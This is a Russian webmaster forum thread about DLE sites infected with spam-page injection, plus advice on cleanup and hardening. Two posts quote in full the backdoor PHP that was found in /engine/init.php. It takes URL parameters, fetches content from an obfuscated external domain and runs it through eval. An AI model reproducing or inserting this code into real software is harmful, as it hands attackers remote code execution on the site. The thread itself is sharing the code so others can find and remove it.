Форум Сайтостроение Безопасность

DLE с утра все сайты заразились

Tibald
На сайте с 31.05.2008
Offline
101
Tibald
1581

С утра гугл прислал несколько уведомлений об пачке сайтов на 1 акке.

Суть вируса заключается в том, что генерируются странички при открытии урл.

Например:

gratias.ru/?for_um=2132

law-strategy.ru/?for_um=2132

zabolel.net/?for_um=2132

И т.п.

В поиске если вбить "for_um=2132" можно найти множество сайтов в индексе с этим говном.

Кто уже ловил, подскажите куда копать, что б вырезать это?

п.с. на моих сайтах стоит DLE лицензии от 9.0 до 10.1 беленькие.

TF-Studio
На сайте с 17.08.2010
Offline
334
TF-Studio
#1

Ковыряйте логи - там будет сразу видно через что вирус попал.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
Tibald
На сайте с 31.05.2008
Offline
101
Tibald
#2

Все нашел. Если темку те, у кого это увидят. То искать надо такой код:

if(isset($_GET['for'.'_um'])){ $p = (int)$_GET['for'.'_um'];header('Content-Type: text/html; charset=windows-1251'); echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/18/$p.html")). '<?'); die; } if(isset($_GET['m'])) { $m = (int)$_GET['m']; if($m==0)$m="";header('Content-Type: text/html; charset=windows-1251'); echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/18/map$m.html")). '<?'); die; } if(isset($_GET['for'.'um1']) && $_GET['for'.'um1'] == 'index') {header('Content-Type: text/html; charset=windows-1251'); echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/18/index1.html")). '<?'); die(); } echo '';
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#3

а оставили эту грязь зачем?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
seosniks
На сайте с 13.08.2007
Offline
389
seosniks
#4
kgtu5:
а оставили эту грязь зачем?

Еще проверьте htaccess на всякий случай. А что за хостинг хоть? А то у меня на одном хосте всегда ломали, чтоб ы я не делал. На другом после переноса сайтов прекратилось.

РР
На сайте с 17.02.2012
Offline
74
Рамазан Рамазанов
#5

У меня было подобное, помню удалял в индекс.пхп много хлама, потом поменял некоторые дистрибутивные файлы, но через время опять заразили. Потом поменял хостинг, новый двиг полностью кроме папки аплоад и бекап восстановил. Так что могли и хостера взломать и админку.

Мошенническая рассылка от nic.ru: Автоматическое создание сабов Прошу обсудить технологию защиты
kalasan
На сайте с 11.07.2008
Offline
167
kalasan
#6

Рамазан Рамазанов, скорее всего вирус был в папке engine, поэтому замена Index.php не помогла, а помогло только обновление движка...

Вообще, риск заражения очень сильно снижается, если:

1. обновлять сайт регулярно, т.е. ставить актуальную версию ДЛЕ

2. ставить заплатки официальные

3. ставить нужные права, как прописано в инструкции (444 права особенно)

Тогда у вас такая проблема будет намноооого реже, но все же могут все равно заразить особо проворливые )

Устал от абуз? Бери VDS на Friendhosting.net (https://friendhosting.net/pl.php?6656). А еще у них замечательный саппорт!
оявление постороннего кода в Заказ на рекламу сомнительного LoadPays.com - Конвертация файлового
C
На сайте с 19.12.2011
Offline
32
cord
#7
kgtu5:
а оставили эту грязь зачем?

Чтоб организовать (и индексировать ПС-ми) вот такую дрянь, вида псевдо-форума:

Tibald:
То искать надо такой код:

Верно, благодарю за наводку. Левый код стоит в папке и файле - /engine/init.php примерно с 40 по 56 стоки: 

if(isset($_GET['for'.'_um'])){

	$p = (int)$_GET['for'.'_um'];

	header('Content-Type: text/html; charset=windows-1251');

	echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/$p.html")). '<?');

	die;

}

if(isset($_GET['m'])) {

	$m = (int)$_GET['m'];

	if($m==0)$m="";

	header('Content-Type: text/html; charset=windows-1251');

	echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/map$m.html")). '<?');

	die;

} if(isset($_GET['for'.'um1'])) {

	header('Content-Type: text/html; charset=windows-1251');

	echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/index1.html")). '<?');

	die();

} echo '';

Ищите не целиком, а частично по кускам кода. Это удалить, а защититься от подобного нужно другими методами.

Есть еще похожие варианты подобных псевдо-форумов, которые организованы на ваших сайтах (доменах) в виде php страниц, т.е. не как здесь организовано:

ваш-сайт/?for_um=2009

а так:

ваш-сайт/engine/skins/zdes-levaya-stranica.php (примерно подобное).

Ищется по названию папки (в данном случае skins) и удаляются все левые страницы и картинки от псевдо-форума, а так же проверяется файл index.php в корне сайта на наличие левого кода.

Уязвимость может быть как движка сайта, так и хостера. Залитый хостеру шелл может располагаться на чужих сайтах и тем самым обеспечивается доступ ко всем соседним сайтам.

Честно сказать, то сейчас любой шкодила за 20-40 баксов приобретает скрипт с инструкцией по применению от не чистого на голову программера. По моему мнению, таким шкодилам нужно руки отрубать, а тем кто продает такие шеллы выкалывать глаза. И дело с концом, и другим не повадно в чужой карман лезть.

Вирус: Жаркая зима от Вирус на хостинге - DLE - интересный взлом

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий